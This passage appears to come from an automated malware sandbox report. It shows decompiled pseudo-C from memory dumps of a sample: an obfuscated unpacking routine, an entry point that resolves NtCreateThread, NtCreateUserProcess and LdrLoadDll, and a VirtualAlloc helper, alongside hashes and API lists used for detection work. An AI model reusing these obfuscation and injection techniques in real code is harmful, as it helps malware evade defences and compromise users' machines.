				intOrPtr _t279;
				intOrPtr _t296;
				signed int _t297;
				void* _t301;
				signed int _t303;
				signed int* _t317;
				signed int** _t326;
				char* _t327;
				intOrPtr _t330;
				intOrPtr _t331;
				intOrPtr _t332;
				intOrPtr _t333;
				intOrPtr _t338;
				signed int _t341;
				intOrPtr _t346;
				signed int _t352;
				signed int _t358;
				intOrPtr _t365;
				void* _t366;
				void* _t381;

				_t366 = __edx;
				_t140 = __eax + 0x24497fd;
				if(_t140 > 0) {
					asm("in al, dx");
					asm("in eax, 0x72");
					 *_t140 =  *_t140 + _t140;
					_t141 =  *0x24492e0; // 0x19fde0
					 *0x2449851 = 0x5958;
					 *(_t381 - 0x18) = 0xc6f8e435;
					 *(_t381 - 0x38) = 0;
					 *0x24497f9 = __edi;
					 *(_t381 - 0x10) = 0xc6f8e434;
					_push(__edi);
					 *(_t381 - 0xc) = 0xc6f8e679;
					 *(_t381 - 8) = _t141;
					 *0x2449749 = __edi;
					while(1) {
						asm("sbb dword [0x2449795], 0x7c00");
						if(( *(_t381 - 0xc) ^ 0x2a823c2b) + 0x138527e2 == 0) {
							break;
						}
						 *(_t381 - 0x1c) =  *(_t381 - 0xc) *  *(_t381 - 0x10);
						 *0x244985d =  *0x244985d - 0x244983d;
						asm("adc dword [0x2449849], 0x2449801");
						 *(_t381 - 0x28) =  *(_t381 - 0xc) +  *(_t381 - 0x18);
						do {
							 *0x244985d =  *0x244985d | 0x02449755;
							RtlAllocateHeap(0); // executed
							 *0x2449749 =  *0x2449749 | 0x02449801;
						} while (IsCharAlphaNumericW(0x31) == 0);
						_t153 =  *(_t381 - 0xc);
						_t315 = _t381 - 0x24;
						 *0x2449845 = 0x3b0e;
						 *(_t381 - 0x38) = _t381 - 0x24;
						 *(_t381 - 0x14) = 0xc6f8e434;
						 *0x2449815 = 0x1c6f;
						 *(_t381 - 0x28) = _t153;
						 *0x2449801 = 0x5773;
						 *(_t381 - 0x1c) = 0xc6f8e435;
						 *0x2449755 = 0x75b3;
						 *0x24491a0 = 0x2449028;
						 *0x2449805 = 0x279e;
						if(_t153 != 0xc6f8e5bc) {
							 *0x244977d = 0xf85;
							 *0x244980d = 0x67ac;
							if(_t153 != 0xc6f8e514) {
								L10:
								 *0x2449801 = 0x55d9;
								if( *(_t381 - 0x28) == 0xc6f8e41b) {
									 *0x2449781 =  *0x2449781 - _t366;
									 *(_t381 - 0x24) = ( *(_t381 - 0x14) ^ 0x2a823c2b) + 0x138527e2;
								}
							} else {
								asm("sbb ecx, eax");
								 *0x244973d = 0x2c3f;
								_t365 =  *0x244942c; // 0x400000
								 *0x244980d =  *0x244980d + 0x2449789;
								 *0x2449841 = 0x2804;
								if(( *(_t381 - 0x1c) ^ 0x2a823c2b) + 0x138527e2 == _t365) {
									 *0x2449739 = 0x2449749 +  *0x2449739;
									E02442F44(_t366, 0xc60001b8,  *(_t381 - 0x1c));
									goto L10;
								}
							}
						} else {
							E024413C7(_t315, _t366);
							 *0x2449815 = 0x4b90;
						}
						asm("adc ecx, [0x2449839]");
						 *0x244973d =  *0x244973d & 0x000000ff;
						_t317 =  *0x2449871; // 0x2449845
						 *0x24497c1 =  *0x24497c1 |  *_t317;
						 *(_t381 - 0x28) =  *(_t381 - 0x24);
						asm("sbb [0x2449739], edx");
						 *0x2449785 = 0x5cc5;
						asm("sbb dword [0x2449859], 0x5f55");
						 *0x2449859 = 0x73ee;
						if( *(_t381 - 0x28) == ( *(_t381 - 0x10) ^ 0x2a823c2b) + 0x138527e2) {
							asm("sbb [0x2449739], eax");
							_t358 =  *0x2449855; // 0xd3d8a4ca
							 *0x2449785 =  *0x2449785 ^ _t358;
							 *0x244985d = 0x2d00;
							 *0x2449739 =  *0x2449739 | 0x138527e2;
							 *(_t381 - 0x14) = ( *(_t381 - 0x18) ^ 0x2a823c2b) + 0x138527e2;
							_t169 =  *0x24492d0; // 0x19fdcc
							 *0x24492d0 =  *0x24492d0 ^ _t169;
							 *0x2449745 =  *0x2449745 + 0x4c42;
							_t170 =  *0x24492d4; // 0x2440000
							 *0x2449254 = _t170;
							asm("sbb [0x2449781], ecx");
							 *0x2449024 =  *0x24492d8;
							_t173 =  *0x24492dc; // 0xe193d4a8
							 *0x2449855 =  ~( *0x2449855);
							 *0x2449274 = _t173;
						}
						asm("adc dword [0x24497cd], 0x62f2");
						asm("sbb dword [0x24497d5], 0x24497c1");
						 *0x2449785 =  *0x2449785 | 0x02449849;
						 *0x2449809 =  *0x2449809 - 0x244983d;
						 *0x244973d =  *0x244973d ^ 0x000036b8;
						 *(_t381 - 0xc) = ( *(_t381 - 0xc) ^ 0x2a823c2b) - ( *(_t381 - 0x10) ^ 0x2a823c2b) - 0x138527e2 ^ 0x2a823c2b;
					}
					 *0x244973d =  *0x244973d ^ 0x0244984d;
					 *(_t381 - 0x34) =  *(_t381 - 8);
					asm("sbb eax, eax");
					_t185 =  *0x24491a0; // 0x2449028
					 *(_t381 - 0xc) = 0xc6f8e435;
					 *(_t381 - 0x38) = 0xc6f8e465;
					_t369 = 0xc6f8e434;
					 *(_t381 - 0x28) = 0xc6f8e434;
					 *0x2449805 =  *0x2449805 | 0x00001f5f;
					 *0x2449795 =  *0x2449795 | 0x02449785;
					 *0x24497d1 = 0x3c4b;
					if(( *(_t381 - 0x28) ^ 0x2a823c2b) + 0x138527e2 ==  *0x2449024) {
						L37:
						_t186 =  *(_t381 - 0xc);
					} else {
						_t43 = _t185 + 0x1c8; // 0x2449264
						 *0x2449841 =  *0x2449841 + 0x3492;
						 *(_t381 - 0x38) = 0xc6f8e408;
						 *0x2449859 =  *0x2449859 - 0x55f2;
						 *(_t381 - 1) = 0x85;
						 *0x24497d5 =  *0x24497d5 - 0x6364;
						 *0x2449745 =  *0x2449745 | 0x024497c5;
						asm("adc dword [0x244985d], 0x2449789");
						 *0x2449789 = 0x2098;
						asm("adc dword [0x2449779], 0x65bc");
						 *0x2449781 = 0x1a64;
						if(( *(_t381 - 0xc) ^ 0x2a823c2b) + 0x138527e2 == ( *( *_t43) ^ 0x2a823c2b) + 0x138527e2) {
							goto L37;
						} else {
							asm("adc dword [0x2449791], 0x6fee");
							asm("adc dword [0x2449801], 0x2449845");
							 *(_t381 - 0x14) =  *(_t381 - 0xc);
							 *0x2449855 =  *0x2449855 ^ 0x024497f9;
							 *0x244984d =  *0x244984d - 0x24497f9;
							 *0x244973d =  *0x244973d & 0x02449749;
							_t228 = ( *(_t381 - 0xc) ^ 0x2a823c2b) + 0x138527e2;
							while(1) {
								_t338 =  *0x24491a0; // 0x2449028
								_t52 = _t338 + 0x194; // 0x2449204
								_t296 =  *((intOrPtr*)( *_t52));
								_t297 =  *(_t296 + 0x3c);
								 *0x24497d1 = 0x5783;
								if(_t228 >=  *((intOrPtr*)(_t297 + _t296 + 0x28))) {
									break;
								}
								_t341 =  *0x2449849; // 0x7c7a
								 *0x244980d =  *0x244980d + _t341;
								 *(_t381 - 0x14) = ( *(_t381 - 0x14) ^ 0x2a823c2b) + 0x00000001 ^ 0x2a823c2b;
								_t228 = _t228 + 1;
							}
							_t229 =  *0x244975d; // 0x244977d
							 *0x244984d =  *0x244984d +  *_t229;
							 *(_t381 - 0x38) = _t369;
							asm("adc ecx, [0x2449859]");
							_t346 =  *0x24491a0; // 0x2449028
							 *0x2449851 =  *0x2449851 + 0x2449741;
							_t58 = _t346 + 0x194; // 0x2449204
							 *0x2449789 =  *0x2449789 + 0x1acf;
							 *0x244977d =  *0x244977d & 0x0244978d;
							 *0x24492cc = ( *(_t381 - 0x14) ^ 0x2a823c2b) +  *((intOrPtr*)( *_t58)) + 0x138527e2;
							 *(_t381 - 8) = 0x1e725789;
							 *(_t381 - 0x14) = 0xc6f8e455;
							 *0x244983d = 0x1113;
							 *0x244984d =  *0x244984d | 0x02449849;
							 *0x2449861 =  *0x2449861 + 0x2449739;
							_t352 = ( *(_t381 - 0xc) ^ 0x2a823c2b) + 0x138527e2;
							 *0x2449841 = 0x5ec5;
							 *(_t381 - 0x28) = _t352;
							 *0x2449859 = 0x64a7;
							if(_t352 < ( *(_t381 - 0x14) ^ 0x2a823c2b) + 0x138527e2) {
								_t66 = _t352 - 0x138527e2; // 0xb373be97
								_t301 = (_t297 & 0x0000099c) + 0x414f;
								 *(_t381 - 0x10) = _t66;
								do {
									 *0x2449841 =  *0x2449841 - 0x2449861;
									 *0x24497cd =  *0x24497cd + 0x138527e2;
									_t303 =  *0x2449809; // 0x2009085
									 *0x244974d =  *0x244974d | _t303;
									 *0x2449815 =  *0x2449815 & 0x02449801;
									 *(_t381 - 8) = (( *(_t381 - 0x10) ^ 0x2a823c2b) * 0xdf41139d ^ 0xc6f8e08e) +  *(_t381 - 8);
									 *0x244983d =  *0x244983d + _t303;
									_t250 =  *0x24492cc; // 0x4f41139d
									 *((intOrPtr*)(_t381 - 0x30)) = _t250;
									asm("adc ebx, ebx");
									_t251 =  *(_t381 - 8);
									_t369 = _t251 % 0xc6f8e408;
									asm("sbb eax, [0x2449801]");
									_t253 =  *(_t381 - 0x10);
									asm("adc dword [0x24497bd], 0x4ebe");
									if(_t251 % 0xc6f8e408 == 0) {
										asm("adc [0x2449755], edx");
										_t369 =  *(_t381 - 8);
										 *0x2449839 = ( *0x2449839 & 0x000000ff) -  *0x2449809;
										 *0x2449781 =  *0x2449781 + ( *0x24497c9 & 0x0000ffff);
										 *0x2449849 =  *0x2449849 ^ _t369;
										 *0x2449811 = 0x3142;
										 *(_t381 - 8) = (_t253 ^ 0xffc33fbf | 0xdf41139d) + 0x39071f72 & _t369;
									} else {
										 *0x2449749 =  *0x2449749 - 0x4d1b;
										 *0x24497bd =  *0x24497bd | 0x02449795;
										 *(_t381 - 8) =  *(_t381 - 8) - ((_t253 ^ 0xea823c2b) + 0x0636139d | 0xc6f8d08e);
									}
									asm("adc eax, ebx");
									 *0x2449785 =  *0x2449785 - 0xdc8;
									_t301 = ( *(_t381 - 0xc) ^ 0x2a823c2b) + 0x138527e2;
									 *0x24497d5 = 0x4d84;
									 *0x2449801 = 0x2574;
									if(_t301 < ( *(_t381 - 0x14) ^ 0x2a823c2b) + 0x138527e2) {
										_t84 = _t301 - 0x138527e2; // 0xb373be97
										 *0x2449815 =  *0x2449815 ^ 0x00001809;
										 *(_t381 - 0x1c) = _t84;
										do {
											 *0x2449861 =  *0x2449861 - 0x138527e2;
											asm("adc [0x2449745], ecx");
											_t266 =  *(_t381 - 0x1c) ^ 0x2a823c2b;
											 *(_t381 - 0x2c) = _t266;
											asm("sbb dword [0x24497b9], 0x73b9");
											 *(_t381 - 8) =  *(_t381 - 8) - (_t266 * 0xc601139d ^ 0xc6f8d08e);
											_t269 =  *(_t381 - 8);
											_t369 = _t269 % 0xc6f8e408;
											_t271 =  *(_t381 - 0x10);
											if(_t269 % 0xc6f8e408 == 0) {
												 *(_t381 - 8) = (_t271 ^ 0xffc33fbf | 0xdf41139d) + 0x39071f72 &  *(_t381 - 8);
											} else {
												 *(_t381 - 8) =  *(_t381 - 8) - ((_t271 ^ 0xea823c2b) + 0x0636139d | 0xc6f8d08e);
											}
											if( *(_t381 - 0x2c) == 0xc6f8e465) {
												_t279 =  *0x24491a0; // 0x2449028
												_t101 = _t279 + 0x194; // 0x2449204
												 *( *(_t381 - 0x34)) =  *((intOrPtr*)(_t381 - 0x30))( *((intOrPtr*)( *_t101)),  *0x2449024,  *0x2449274);
											}
											_t301 = _t301 + 1;
											 *(_t381 - 0x1c) =  *(_t381 - 0x1c) + 1;
										} while (_t301 < ( *(_t381 - 0x14) ^ 0x2a823c2b) + 0x138527e2);
										_t352 =  *(_t381 - 0x28);
									}
									_t352 = _t352 + 1;
									 *(_t381 - 0x10) =  *(_t381 - 0x10) + 1;
									 *(_t381 - 0x28) = _t352;
								} while (_t352 < ( *(_t381 - 0x14) ^ 0x2a823c2b) + 0x138527e2);
							}
							 *0x2449218 = ( *(_t381 - 0xc) ^ 0x2a823c2b) + 0x138527e2;
							 *0x2449220 = ( *(_t381 - 0xc) ^ 0x2a823c2b) + 0x138527e2;
							_t186 =  *(_t381 - 0x38);
						}
					}
					 *(_t381 - 0x14) = (_t186 ^ 0x2a823c2b) + 0x138527e2;
					 *(_t381 - 0x14) =  *(_t381 - 0x14) - 0x138527e2 ^ 0x2a823c2b;
					_t325 =  *(_t381 - 0x18);
					if( *(_t381 - 0x18) !=  *(_t381 - 0x14)) {
						_t326 =  *0x24492e0; // 0x19fde0
						_t195 = ( *(_t381 - 0x18) ^ 0x2a823c2b) + 0x138527e2;
						 *_t326 = _t195;
					} else {
						_t196 =  *0x244901c; // 0x2449438
						 *(_t381 - 0x20) =  *(_t381 - 0x20) & 0x00000000;
						 *(_t381 - 0x20) =  *(_t381 - 0x20) |  *_t196;
						_t198 =  *0x24492c4; // 0xc7e310bf
						 *(_t381 - 0x38) = _t198;
						 *(_t381 - 0x38) = 0xc6f8e475;
						 *(_t381 - 0x28) = 0xc6f8e408;
						 *(_t381 - 1) = 0x85;
						_t206 =  *0x24491c0; // 0x2449428
						E02442209(_t325, _t369, 0x138527e2,  *_t206, 0x2449116, 1, 4); // executed
						_t327 =  *0x24492c8; // 0x2442646
						 *_t327 = ( *(_t381 - 1) ^ 0x0000003f) + 0x2f;
						_t330 =  *0x24492c8; // 0x2442646
						_t331 =  *0x24492b8; // 0x24590b3
						_t332 =  *0x24492c8; // 0x2442646
						 *((intOrPtr*)(_t332 + 1)) = 0xec7ad81e - ( *(_t381 - 0x28) ^ 0x2a823c2b) - _t330 + _t331;
						_t215 =  *0x24492b8; // 0x24590b3
						 *_t215( *0x2449358,  *0x2449254,  *0x2449024,  *0x2449274,  *(_t381 - 0x20),  *0x24491a0,  *0x24492c8, ( *(_t381 - 0x28) ^ 0x2a823c2b) + 0x138527e2, ( *(_t381 - 0x38) ^ 0x2a823c2b) + 0x138527e2, _t381 - 0x3c);
						 *0x24492d0 = _t381 + 4;
						_t218 =  *0x24492d0; // 0x19fdcc
						_t333 =  *0x2449218; // 0x2040000
						 *_t218 =  *_t218 + _t333;
						_t219 =  *0x24491a0; // 0x2449028
						_t137 = _t219 + 0x1cc; // 0x2449440
						_t195 =  *0x24492e0; // 0x19fde0
						 *_t195 =  *_t195 |  *( *_t137);
					}
					return _t195;
				} else {
					 *_t140 =  *_t140 + _t140;
					asm("sldt word [eax]");
					 *0x2449815 = 0x1ed3;
					asm("sldt word [eax]");
					return 0xc6713389;
				}
			}

0x0244266e
0x0244266e
0x02442673
0x0244269d
0x024426a0
0x024426a2
0x024426a4
0x024426af
0x024426b9
0x024426bc
0x024426c4
0x024426ca
0x024426d3
0x024426da
0x024426e1
0x024426e9
0x024429a2
0x024429a5
0x024429b3
0x00000000
0x00000000
0x02442704
0x02442710
0x0244271d
0x02442727
0x0244272a
0x0244272a
0x02442736
0x0244273e
0x0244274e
0x0244275f
0x02442765
0x02442768
0x02442772
0x02442775
0x0244277c
0x02442786
0x02442789
0x02442793
0x02442796
0x024427a0
0x024427aa
0x024427b9
0x024427d3
0x024427e2
0x024427ec
0x0244283e
0x0244283e
0x0244284f
0x0244286e
0x02442874
0x02442874
0x024427f2
0x024427f2
0x024427f7
0x02442801
0x02442809
0x02442817
0x02442821
0x0244282f
0x02442839
0x00000000
0x02442839
0x02442821
0x024427bf
0x024427bf
0x024427c4
0x024427c4
0x0244287e
0x02442884
0x0244288d
0x02442895
0x0244289b
0x0244289e
0x024428a7
0x024428b4
0x024428c4
0x024428ce
0x024428db
0x024428e4
0x024428ea
0x024428f2
0x024428fe
0x02442904
0x02442918
0x0244291d
0x02442923
0x0244292d
0x02442932
0x02442937
0x02442943
0x0244294d
0x02442952
0x02442958
0x02442958
0x0244295d
0x0244296d
0x02442979
0x02442987
0x02442993
0x0244299f
0x0244299f
0x024429bc
0x024429c6
0x024429c9
0x024429cb
0x024429d6
0x024429d9
0x024429e6
0x024429eb
0x024429ee
0x02442a01
0x02442a0f
0x02442a1b
0x02442e28
0x02442e28
0x02442a21
0x02442a21
0x02442a27
0x02442a33
0x02442a3a
0x02442a44
0x02442a48
0x02442a55
0x02442a61
0x02442a6d
0x02442a79
0x02442a87
0x02442a91
0x00000000
0x02442a97
0x02442a97
0x02442aa4
0x02442aae
0x02442ab1
0x02442abe
0x02442aca
0x02442ad4
0x02442aff
0x02442b06
0x02442b0c
0x02442b12
0x02442b16
0x02442b19
0x02442b27
0x00000000
0x00000000
0x02442adb
0x02442ae1
0x02442afb
0x02442afe
0x02442afe
0x02442b2d
0x02442b34
0x02442b3a
0x02442b3d
0x02442b46
0x02442b4c
0x02442b56
0x02442b5c
0x02442b68
0x02442b7b
0x02442b80
0x02442b8d
0x02442b9c
0x02442ba9
0x02442bb5
0x02442bc1
0x02442bc5
0x02442bcf
0x02442bd2
0x02442bde
0x02442bea
0x02442bf0
0x02442bf6
0x02442bf9
0x02442bfe
0x02442c0a
0x02442c16
0x02442c1c
0x02442c2c
0x02442c36
0x02442c39
0x02442c3f
0x02442c45
0x02442c48
0x02442c4a
0x02442c52
0x02442c54
0x02442c5a
0x02442c5d
0x02442c69
0x02442ca0
0x02442ca6
0x02442cb6
0x02442cc8
0x02442cd3
0x02442cde
0x02442cea
0x02442c6f
0x02442c74
0x02442c83
0x02442c92
0x02442c92
0x02442ced
0x02442cf9
0x02442d03
0x02442d07
0x02442d13
0x02442d1d
0x02442d24
0x02442d2a
0x02442d34
0x02442d37
0x02442d37
0x02442d46
0x02442d4c
0x02442d4e
0x02442d57
0x02442d66
0x02442d69
0x02442d73
0x02442d75
0x02442d7a
0x02442dab
0x02442d80
0x02442d8f
0x02442d8f
0x02442db5
0x02442dc7
0x02442dcc
0x02442dda
0x02442dda
0x02442de1
0x02442de2
0x02442de7
0x02442def
0x02442def
0x02442df7
0x02442df8
0x02442dfd
0x02442e00
0x02442bf9
0x02442e0f
0x02442e1b
0x02442e20
0x02442e20
0x02442a91
0x02442e2f
0x02442e39
0x02442e3f
0x02442e44
0x02442f31
0x02442f39
0x02442f3b
0x02442e4a
0x02442e4a
0x02442e51
0x02442e55
0x02442e58
0x02442e5d
0x02442e60
0x02442e67
0x02442e72
0x02442e8c
0x02442e9c
0x02442ea4
0x02442eae
0x02442ebc
0x02442ec4
0x02442ecf
0x02442ed5
0x02442ef3
0x02442efe
0x02442f03
0x02442f08
0x02442f0d
0x02442f13
0x02442f15
0x02442f1a
0x02442f22
0x02442f27
0x02442f27
0x02442f41
0x02442675
0x02442675
0x02442677
0x0244267f
0x02442689
0x02442696
0x02442696

Memory Dump Source

Source File: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true

Associated: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a795cb734958492f6ef023159ed947ac6d133d1f40d175b3443caaba2ccb616
Instruction ID: 674ad5c822bfb4dea22f6d794b47a2ada55dd5104c14f2cc361af4ee7c96fd9f
Opcode Fuzzy Hash: 2a795cb734958492f6ef023159ed947ac6d133d1f40d175b3443caaba2ccb616
Instruction Fuzzy Hash: DCE19C79E90604DFEB08CFA8E88599BBBF2FB48314B144C5AE405EB351D7709965EF10

Uniqueness

Uniqueness Score: -1.00%

Function 00415552, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00415552() {
				void* _t30;
				void* _t33;
				intOrPtr* _t35;
				void* _t36;
				void* _t39;
				void* _t41;

				_t39 = _t41 - 0x74;
				_t17 = _t39 - 0x260;
				 *((char*)(_t39 + 0x73)) = 0;
				__imp__SHGetFolderPathW(0, 0x24, 0, 0, _t17, _t33, _t36, _t30); // executed
				if(_t17 != 0) {
					L8:
					E004111B9(_t17,  *((intOrPtr*)(_t39 + 0x7c)), 0, 0x10);
				} else {
					PathAddBackslashW(_t39 - 0x260);
					_t35 = __imp__GetVolumeNameForVolumeMountPointW;
					while(1) {
						_t17 =  *_t35(_t39 - 0x260, _t39 - 0x58, 0x64); // executed
						if(_t17 != 0) {
							break;
						}
						PathRemoveBackslashW(_t39 - 0x260);
						if(PathRemoveFileSpecW(_t39 - 0x260) == 0) {
							goto L8;
						} else {
							PathAddBackslashW(_t39 - 0x260);
							continue;
						}
						goto L9;
					}
					if( *((short*)(_t39 - 0x44)) != 0x7b) {
						goto L8;
					} else {
						 *((short*)(_t39 + 8)) = 0;
						_t17 = _t39 - 0x44;
						__imp__CLSIDFromString(_t17,  *((intOrPtr*)(_t39 + 0x7c)));
						if(_t17 != 0) {
							goto L8;
						} else {
							 *((char*)(_t39 + 0x73)) = 1;
						}
					}
				}
				L9:
				return  *((intOrPtr*)(_t39 + 0x73));
			}

0x00415553
0x00415562
0x0041556e
0x00415571
0x00415579
0x004155f0
0x004155f6
0x0041557b
0x00415588
0x0041558a
0x004155b9
0x004155c6
0x004155ca
0x00000000
0x00000000
0x00415599
0x004155ae
0x00000000
0x004155b0
0x004155b7
0x00000000
0x004155b7
0x00000000
0x004155ae
0x004155d1
0x00000000
0x004155d3
0x004155d8
0x004155dc
0x004155e0
0x004155e8
0x00000000
0x004155ea
0x004155ea
0x004155ea
0x004155e8
0x004155d1
0x004155fb
0x00415605

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,00000000,74B04EE0,00000000), ref: 00415571
PathAddBackslashW.SHLWAPI(?), ref: 00415588
PathRemoveBackslashW.SHLWAPI(?), ref: 00415599
PathRemoveFileSpecW.SHLWAPI(?), ref: 004155A6
PathAddBackslashW.SHLWAPI(?), ref: 004155B7
GetVolumeNameForVolumeMountPointW.KERNELBASE(?,?,00000064), ref: 004155C6
CLSIDFromString.OLE32(?,?), ref: 004155E0

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Path$Backslash$RemoveVolume$FileFolderFromMountNamePointSpecString
String ID:
API String ID: 613918483-0
Opcode ID: 5219857b68e5ef302cb5446ba1590e2057f0d5cdd0a55ed3acf8b3b821d0c263
Instruction ID: 5a4938543e013854fceabb10c3023cdc853cff9575463981f244d27b68a6c6f8
Opcode Fuzzy Hash: 5219857b68e5ef302cb5446ba1590e2057f0d5cdd0a55ed3acf8b3b821d0c263
Instruction Fuzzy Hash: 3411AF7150410CEADB209BB0CD88EEF77BEEB44344F180067B611E3120E638DA889B68

Uniqueness

Uniqueness Score: -1.00%

Function 004074B5, Relevance: 9.1, APIs: 6, Instructions: 83
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(signed int __ecx, void* __edx, void* __eflags) {
				char _v5;
				int _v12;
				char _v16;
				char _v20;
				void* _t22;
				void* _t28;
				char _t29;
				char _t33;
				signed int _t36;

				_t34 = __ecx;
				_t33 = 0; // executed
				_t22 = E00406532(__ecx, __edx, 0); // executed
				if(_t22 == 0) {
					L24:
					__eflags = _t33;
					_t21 = _t33 == 0;
					__eflags = _t21;
					ExitProcess(0 | _t21);
				}
				_v20 = 0;
				_v16 = 1;
				_v5 = 0;
				SetErrorMode(0x8007);
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v12);
				if(_t28 == 0) {
					L19:
					_t29 = E0040716E(_t34, __eflags, _v20, _v16);
					L20:
					_t33 = _t29;
					L21:
					if(_t33 == 0 || ( *0x41e590 & 0x00000002) == 0) {
						goto L24;
					} else {
						Sleep(0xffffffff);
						return _t29;
					}
				}
				_t36 = 0;
				if(_v12 <= 0) {
					L14:
					LocalFree(_t28);
					_t48 = _t33;
					if(_t33 == 0) {
						__eflags = _v5;
						if(__eflags == 0) {
							goto L19;
						}
						E00418161(_t36);
						_t29 = E00417D20();
						__eflags =  *0x41e590 & 0x00000004;
						_t33 = _t29;
						if(( *0x41e590 & 0x00000004) != 0) {
							_t29 = E00418086(0x41fe78, 0);
						}
						goto L21;
					}
					_t29 = E00406FCD(_t48);
					goto L20;
				} else {
					goto L3;
				}
				do {
					L3:
					_t34 =  *(_t28 + _t36 * 4);
					if(_t34 != 0 &&  *_t34 == 0x2d) {
						_t34 =  *(_t34 + 2) & 0x0000ffff;
						if(_t34 == 0x66) {
							_v20 = 1;
						} else {
							if(_t34 == 0x69) {
								_t33 = 1;
							} else {
								if(_t34 == 0x6e) {
									_v16 = 0;
								} else {
									if(_t34 == 0x76) {
										_v5 = 1;
									}
								}
							}
						}
					}
					_t36 = _t36 + 1;
				} while (_t36 < _v12);
				goto L14;
			}

0x004074b5
0x004074be
0x004074c0
0x004074c7
0x004075a1
0x004075a3
0x004075a5
0x004075a5
0x004075a9
0x004075a9
0x004074d2
0x004074d5
0x004074d9
0x004074dc
0x004074ed
0x004074f5
0x0040757c
0x00407582
0x00407587
0x00407587
0x00407589
0x0040758b
0x00000000
0x00407596
0x00407598
0x004075a0
0x004075a0
0x0040758b
0x004074fb
0x00407500
0x00407541
0x00407542
0x00407548
0x0040754a
0x00407553
0x00407557
0x00000000
0x00000000
0x00407559
0x0040755e
0x00407563
0x0040756a
0x0040756c
0x00407575
0x00407575
0x00000000
0x0040756c
0x0040754c
0x00000000
0x00000000
0x00000000
0x00000000
0x00407502
0x00407502
0x00407502
0x00407507
0x0040750f
0x00407516
0x00407537
0x00407518
0x0040751b
0x00407533
0x0040751d
0x00407520
0x0040752d
0x00407522
0x00407525
0x00407527
0x00407527
0x00407525
0x00407520
0x0040751b
0x00407516
0x0040753b
0x0040753c
0x00000000

APIs

Part of subcall function 00406532: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00406573
Part of subcall function 00406532: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00406649
Part of subcall function 00406532: GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 00406668
Part of subcall function 00406532: GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 0040667A
Part of subcall function 00406532: GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 0040668C
Part of subcall function 00406532: GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 0040669E
Part of subcall function 00406532: GetProcAddress.KERNEL32(LdrLoadDll), ref: 004066B0
Part of subcall function 00406532: GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 004066C2

SetErrorMode.KERNEL32(00008007,00000000), ref: 004074DC
GetCommandLineW.KERNEL32(?), ref: 004074E6
CommandLineToArgvW.SHELL32(00000000), ref: 004074ED
LocalFree.KERNEL32(00000000), ref: 00407542
Sleep.KERNEL32(000000FF,?,00000001), ref: 00407598
ExitProcess.KERNEL32 ref: 004075A9

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$CommandHandleLineModule$ArgvErrorExitFreeLocalModeProcessSleep
String ID:
API String ID: 1184560534-0
Opcode ID: 55c5115b710db870d711941d5ba89a68d526406fe218d105b82af10003c06d4f
Instruction ID: 0ea6b81123950f51a9b18faa6d3789d77b36d7889cd445f6f70f6cfe78326f6a
Opcode Fuzzy Hash: 55c5115b710db870d711941d5ba89a68d526406fe218d105b82af10003c06d4f
Instruction Fuzzy Hash: A52122B0D4D2447ACB1057B4AC487EE3B646F02308F1884BFE442B66E2C73DA94A875B

Uniqueness

Uniqueness Score: -1.00%

Function 0245B1FE, Relevance: 1.3, APIs: 1, Instructions: 63
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0245B1FE(void** __ebx, void* __ecx, void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int* _a20, intOrPtr _a24) {
				signed int _v8;
				void* _t38;
				signed int _t46;

				 *_a20 = (_a4 ^ 0xf26341d4) + 0x24398beb;
				_t38 = VirtualAlloc(0,  *( *((intOrPtr*)( *((intOrPtr*)(_a24 + 0x194)))) +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a24 + 0x194)))) + 0x3c)) + 0x50), 0x3000, 4); // executed
				 *__ebx = _t38;
				_v8 = (_a4 ^ 0xf26341d4) + 0x24398beb;
				E0245B0E3(_a4, _a8, _a12, _a16, _a20, __ebx,  &_v8, _a24);
				_t46 = (_a4 ^ 0xf26341d4) + 0x24398beb;
				if( *__ebx != _t46) {
					_t46 = ((_a12 ^ 0xf26341d4) + 0x24398beb) * _v8;
					 *_a20 = _t46;
				}
				return _t46;
			}

0x0245b21c
0x0245b24f
0x0245b251
0x0245b260
0x0245b277
0x0245b286
0x0245b28a
0x0245b299
0x0245b29d
0x0245b29d
0x0245b2a2

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,C6F8E435,29A535C8,?,?,?,0245B36A,CFFEF5A6,29A535C1,?,?,C6F8E435,?), ref: 0245B24F

Memory Dump Source

Source File: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true

Associated: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: aa8c94f62c5062207a55c925a7dae50d217e875e72f691cef6857f2c11f38795
Instruction ID: 700379e8fb2f0112662db483f654c7c57a254cabdc54e541e0f30ca4a6b52f90
Opcode Fuzzy Hash: aa8c94f62c5062207a55c925a7dae50d217e875e72f691cef6857f2c11f38795
Instruction Fuzzy Hash: 6021C37A200109AFCB09CF58C891EAA7BE6EF8D354F144059FD059B391C671E921DB90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040716E, Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 243
synchronizationsleepshutdownCOMMON

